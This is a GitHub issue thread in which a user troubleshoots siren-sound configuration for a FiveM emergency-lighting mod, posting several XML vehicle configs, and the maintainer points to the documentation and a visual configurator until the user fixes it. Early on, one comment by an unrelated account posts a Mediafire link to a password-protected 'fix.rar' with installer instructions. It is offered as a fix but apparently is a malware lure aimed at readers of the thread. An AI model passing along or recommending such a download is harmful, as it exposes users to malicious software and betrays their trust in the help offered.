### ISSUE TITLE
cant change the sound of vehicles sirens

### ISSUE THREAD

**Issue by Trko0045** [matsn0w/IIS-EmergencyLS-ELS-FiveM#189]
all vehicles with els emit POLICE_HORN sound instead of exp. Firetruck having AIR HORN etc
the sound i set for the horn dose not work nore do any other for any other vehicle

example of my xml setup 
<?xml version="1.0" encoding="utf-8" ?>
<vcfroot Description="ELS Configuration for Police Vehicle 2" Author="cmdrGreen" Version="2.0">
    
    <INTERFACE>
        <LstgActivationType>euro</LstgActivationType>
        <DefaultSirenMode>active</DefaultSirenMode>
        <InfoPanelHeaderColor>grey</InfoPanelHeaderColor>
        <InfoPanelButtonLightColor>orange</InfoPanelButtonLightColor>
    </INTERFACE>

    
	<EOVERRIDE>	
		<Extra01 IsElsControlled="true" AllowEnvLight="true" Color="blue" OffsetX="-0.70" OffsetY="-0.20" OffsetZ="0.50" />
		<Extra04 IsElsControlled="true" AllowEnvLight="false" Color="blue" OffsetX="-0.25" OffsetY="-0.25" OffsetZ="0.50" />
		<Extra05 IsElsControlled="true" AllowEnvLight="true" Color="blue" OffsetX="0.25" OffsetY="-0.25" OffsetZ="0.50" />
		<Extra06 IsElsControlled="true" AllowEnvLight="false" Color="blue" OffsetX="0.70" OffsetY="-0.20" OffsetZ="0.50" />
		<Extra07 IsElsControlled="true" AllowEnvLight="false" Color="blue" OffsetX="-0.70" OffsetY="-0.20" OffsetZ="0.50" />
		<Extra08 IsElsControlled="true" AllowEnvLight="false" Color="blue" OffsetX="0.70" OffsetY="-0.20" OffsetZ="0.50" />
		<Extra09 IsElsControlled="true" AllowEnvLight="false" Color="blue" OffsetX="0.70" OffsetY="-0.20" OffsetZ="0.50" />
		<Extra10 IsElsControlled="false" AllowEnvLight="false" Color="blue" OffsetX="0.70" OffsetY="-0.20" OffsetZ="0.50" />
		<Extra11 IsElsControlled="false" AllowEnvLight="false" Color="blue" OffsetX="0.70" OffsetY="-0.20" OffsetZ="0.50" />
		<Extra12 IsElsControlled="false" AllowEnvLight="false" Color="blue" OffsetX="0.70" OffsetY="-0.20" OffsetZ="0.50" />
	</EOVERRIDE>

    
    <MISC>
        <VehicleIsSlicktop>false</VehicleIsSlicktop>
        <ArrowboardType>off</ArrowboardType>
        <UseSteadyBurnLights>false</UseSteadyBurnLights>
        <DfltSirenLtsActivateAtLstg>1</DfltSirenLtsActivateAtLstg>
        <Takedowns AllowUse="true" Mirrored="true" />
        <SceneLights AllowUse="true" IlluminateSidesOnly="true" />
    </MISC>

    
    <CRUISE>
        <DisableAtLstg3>true</DisableAtLstg3>
        <UseExtras Extra1="true" Extra2="false" Extra3="false" Extra4="true" />
    </CRUISE>

    
    <SOUNDS>
        <MainHorn InterruptsSiren="true" AudioString="VEHICLE_FIRE_TRUCK_HORN" />
        <ManTone1 AllowUse="false" AudioString="VEHICLES_HORNS_SIREN_1" />
        <ManTone2 AllowUse="false" AudioString="VEHICLES_HORNS_SIREN_2" />
        <SrnTone1 AllowUse="true" AudioString="VEHICLES_HORNS_SIREN_2" />
        <SrnTone2 AllowUse="true" AudioString="VEHICLES_HORNS_SIREN_1" />
        <SrnTone3 AllowUse="true" AudioString="VEHICLES_HORNS_AMBULANCE_WARNING" />
        <SrnTone4 AllowUse="false" AudioString="VEHICLES_HORNS_AMBULANCE_WARNING" />
        <AuxSiren AllowUse="false" AudioString="VEHICLES_HORNS_SIREN_1" />
        <PanicMde AllowUse="false" AudioString="VEHICLES_HORNS_POLICE_WARNING" />
    </SOUNDS>

    
    <PATTERN>
        
        <PRIMARY FlashHighBeam="true">
            <Flash Duration="155" Extras="1,6,9" />
            <Flash Duration="80" Extras="" />
            <Flash Duration="155" Extras="4,5,7" />
            <Flash Duration="80" Extras="" />
        </PRIMARY>
    </PATTERN>
</vcfroot>

**Comment by Avishake2017** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by matsn0w** [comment]
Please read the docs. Your VCF is not valid. This looks like a 'normal' VCF from some other ELS resource, MISS-ELS works differently. See https://github.com/matsn0w/MISS-ELS/blob/main/docs/vcf.md

**Comment by Trko0045** [comment]
if i dont set up fbi like this

<?xml version="1.0" encoding="utf-8" ?>
<vcfroot Description="ELS Configuration for Police Vehicle"
Author="cmdrGreen" Version="1.0">
    
    <INTERFACE>
        <LstgActivationType>euro</LstgActivationType>
        <DefaultSirenMode>standby</DefaultSirenMode>
        <InfoPanelHeaderColor>grey</InfoPanelHeaderColor>
        <InfoPanelButtonLightColor>orange</InfoPanelButtonLightColor>
    </INTERFACE>

    
<EOVERRIDE>
<Extra01 IsElsControlled="true" AllowEnvLight="true" Color="blue"
OffsetX="-0.70" OffsetY="-0.20" OffsetZ="0.50" />
<Extra02 IsElsControlled="true" AllowEnvLight="true" Color="blue"
OffsetX="-0.25" OffsetY="-0.20" OffsetZ="0.50" />
<Extra03 IsElsControlled="true" AllowEnvLight="true" Color="blue"
OffsetX="0.25" OffsetY="-0.20" OffsetZ="0.50" />
<Extra04 IsElsControlled="true" AllowEnvLight="true" Color="blue"
OffsetX="0.70" OffsetY="-0.20" OffsetZ="0.50" />
</EOVERRIDE>

    
    <MISC>
        <VehicleIsSlicktop>false</VehicleIsSlicktop>
        <ArrowboardType>off</ArrowboardType>
        <UseSteadyBurnLights>false</UseSteadyBurnLights>
        <DfltSirenLtsActivateAtLstg>3</DfltSirenLtsActivateAtLstg>
        <Takedowns AllowUse="true" Mirrored="true" />
        <SceneLights AllowUse="true" IlluminateSidesOnly="true" />
    </MISC>

    
    <CRUISE>
        <DisableAtLstg3>true</DisableAtLstg3>
        <UseExtras Extra1="true" Extra2="false" Extra3="false"
Extra4="true" />
    </CRUISE>

    
    <ACORONAS>
        <Headlights DfltPattern="0" ColorL="white" ColorR="white" />
        <TailLights DfltPattern="0" ColorL="blue" ColorR="red" />
        <IndicatorsF DfltPattern="0" ColorL="white" ColorR="white" />
        <IndicatorsB DfltPattern="0" ColorL="blue" ColorR="red" />
        <ReverseLights DfltPattern="0" ColorL="white" ColorR="white" />
    </ACORONAS>

    
    <SOUNDS>
        <MainHorn InterruptsSiren="true" AudioString="SIRENS_AIRHORN" />
        <ManTone1 AllowUse="true" AudioString="VEHICLES_HORNS_SIREN_1" />
        <ManTone2 AllowUse="true" AudioString="VEHICLES_HORNS_SIREN_2" />
        <SrnTone1 AllowUse="true" AudioString="VEHICLES_HORNS_SIREN_1" />
        <SrnTone2 AllowUse="true" AudioString="VEHICLES_HORNS_SIREN_2" />
        <SrnTone3 AllowUse="true"
AudioString="VEHICLES_HORNS_POLICE_WARNING" />
        <SrnTone4 AllowUse="false"
AudioString="VEHICLES_HORNS_AMBULANCE_WARNING" />
        <AuxSiren AllowUse="true" AudioString="VEHICLES_HORNS_SIREN_1" />
        <PanicMde AllowUse="true"
AudioString="VEHICLES_HORNS_POLICE_WARNING" />
    </SOUNDS>

    
    <PATTERN>
        
        <PRIMARY FlashHighBeam="false">
            <Flash Duration="115" Extras="1" />
            <Flash Duration="115" Extras="2" />
            <Flash Duration="155" Extras="1,2,4" />
            <Flash Duration="155" Extras="3" />
        </PRIMARY>
    </PATTERN>
</vcfroot>



nothing works except sounds and rearlights



Med venlig hilsen / Best regards

*D.P.*


Den tirs. 27. aug. 2024 kl. 08.14 skrev Bart Scholtus <
***@***.***>:

**Comment by Trko0045** [comment]
honestly i had lots of trouble whit this xml setup
vehicle extras toggling without them being able to be toggled and lots of
other weird shit
so im rl trying, looking at what you send there isnt much different
except the first lines before pattern set up and after EOVERRIDE


Med venlig hilsen / Best regards

*D.P.*


Den ons. 28. aug. 2024 kl. 18.45 skrev Dawid ***@***.***>:

**Comment by Trko0045** [comment]
<?xml version="1.0" encoding="utf-8" ?>

<vcfroot Description="VCF sample configuration" Author="cmdrGreen" Version="1.1.0">
    
    <EOVERRIDE>
        <Extra01 AllowEnvLight="true" Color="blue" />
        <Extra02 AllowEnvLight="true" Color="blue" />
        <Extra03 AllowEnvLight="true" Color="blue" />
        <Extra04 AllowEnvLight="true" Color="blue" />
    </EOVERRIDE>

    
    <STATIC>
        
    </STATIC>

    
    <SOUNDS>
        <MainHorn AudioString="VEHICLE_SOUND_HORN" />
        <NineMode AllowUse="false" />
        
    </SOUNDS>

    
    <PATTERN>
        <PRIMARY FlashHighBeam="true">
            <Flash Duration="80" Extras="1,2" /> 
            <Flash Duration="80" Extras="3,4" /> 
        </PRIMARY>

        <SECONDARY>
            
        </SECONDARY>

        <REARREDS IsEmergency="false" EnableWarningBeep="true">
            
        </REARREDS>
    </PATTERN>
</vcfroot>



this is the only thing i can change and it still be working

**Comment by Trko0045** [comment]
wrong file 

this is the one i changed and it still is working

<?xml version="1.0" encoding="utf-8" ?>

<vcfroot Description="VCF sample configuration" Author="cmdrGreen" Version="1.1.0">
    
    <EOVERRIDE>
        <Extra01 AllowEnvLight="true" Color="blue" />
        <Extra02 AllowEnvLight="true" Color="blue" />
        <Extra03 AllowEnvLight="true" Color="blue" />
        <Extra04 AllowEnvLight="true" Color="blue" />
    </EOVERRIDE>

    
    <STATIC>
        
    </STATIC>

    
    <SOUNDS>
        <MainHorn AudioString="VEHICLE_SOUND_HORN" />
        <NineMode AllowUse="false" />
        
    </SOUNDS>

    
    <PATTERN>
        <PRIMARY FlashHighBeam="true">
            <Flash Duration="80" Extras="1,2" /> 
            <Flash Duration="80" Extras="3,4" /> 
        </PRIMARY>

        <SECONDARY>
            
        </SECONDARY>

        <REARREDS IsEmergency="false" EnableWarningBeep="true">
            
        </REARREDS>
    </PATTERN>
</vcfroot>

**Comment by Trko0045** [comment]
it dosent show the full thing i send xD llol
<?xml version="1.0" encoding="utf-8" ?>

<vcfroot Description="VCF sample configuration" Author="cmdrGreen" Version="1.1.0">
    
    <EOVERRIDE>
        <Extra01 AllowEnvLight="true" Color="blue" />
        <Extra02 AllowEnvLight="true" Color="blue" />
        <Extra03 AllowEnvLight="true" Color="blue" />
        <Extra04 AllowEnvLight="true" Color="blue" />
    </EOVERRIDE>
    
        
    <STATIC>
        
    </STATIC>

    
    <SOUNDS>
        <MainHorn AudioString="VEHICLE_SOUND_HORN" />
        <NineMode AllowUse="false" />
        
    </SOUNDS>

    
    <PATTERN>
        <PRIMARY FlashHighBeam="true">
            <Flash Duration="80" Extras="1,2" /> 
            <Flash Duration="80" Extras="3,4" /> 
        </PRIMARY>

        <SECONDARY>
            
        </SECONDARY>

        <REARREDS IsEmergency="false" EnableWarningBeep="true">
            
        </REARREDS>
    </PATTERN>
</vcfroot>


this should be good

**Comment by Trko0045** [comment]
i did one like this 
but it dosent do anything at all this way
env are there. sounds. lights extras work
but i cant change anything about it 

<?xml version="1.0" encoding="utf-8" ?>

<vcfroot Description="VCF sample configuration" Author="cmdrGreen" Version="1.1.0">
    
    <EXTRAS>
        <EOVERRIDE>
            <Extra01 AllowEnvLight="false" Color="blue" />
            <Extra02 AllowEnvLight="false" Color="blue" />
            <Extra03 AllowEnvLight="false" Color="blue" />
            <Extra04 AllowEnvLight="false" Color="blue" />
        </EOVERRIDE>
    </EXTRAS>

    
    <SOUNDS>
        <MainHorn AudioString="SIRENS_AIRHORN" />
        <NineMode AllowUse="false" />
        
    </SOUNDS>

    
    <PATTERN>
        <PRIMARY FlashHighBeam="true">
            <Flash Duration="155" Extras="1,2" /> 
            <Flash Duration="155" Extras="3,4" /> 
        </PRIMARY>

        <SECONDARY>
            
        </SECONDARY>

        <REARREDS IsEmergency="false" EnableWarningBeep="true">
            
        </REARREDS>
    </PATTERN>
</vcfroot>

**Comment by matsn0w** [comment]
Have a look at my visual [VCF configurator](https://matsn0w.github.io/MISS-ELS/configurator). You now have a proper XML structure, bot you don't define much behavior. For example, you don't define any sirens in this file. And only 2 'flashes' with some random extras. Please read the instructions carefully and adjust your config.

**Comment by Trko0045** [comment]
got you. should have done more reading instead of annoying you.
i saw it before but figured it wasnt that easy to use
well after doing all 40 cars with it from ground up i can say the tool is
send from god him self

thank for helping.
rn i dont know it i still have sync issues, and i guess the siren thing
just comes down to naming the things right i may have to look for how to
name it correctly because other then the sounds provided in xml i cant use
any other
thanks yet again and sorry for being a pain

Med venlig hilsen / Best regards

*D.P.*


Den tors. 29. aug. 2024 kl. 08.32 skrev Bart Scholtus <
***@***.***>:

**Comment by matsn0w** [comment]
Glad to hear you figured it out ;)
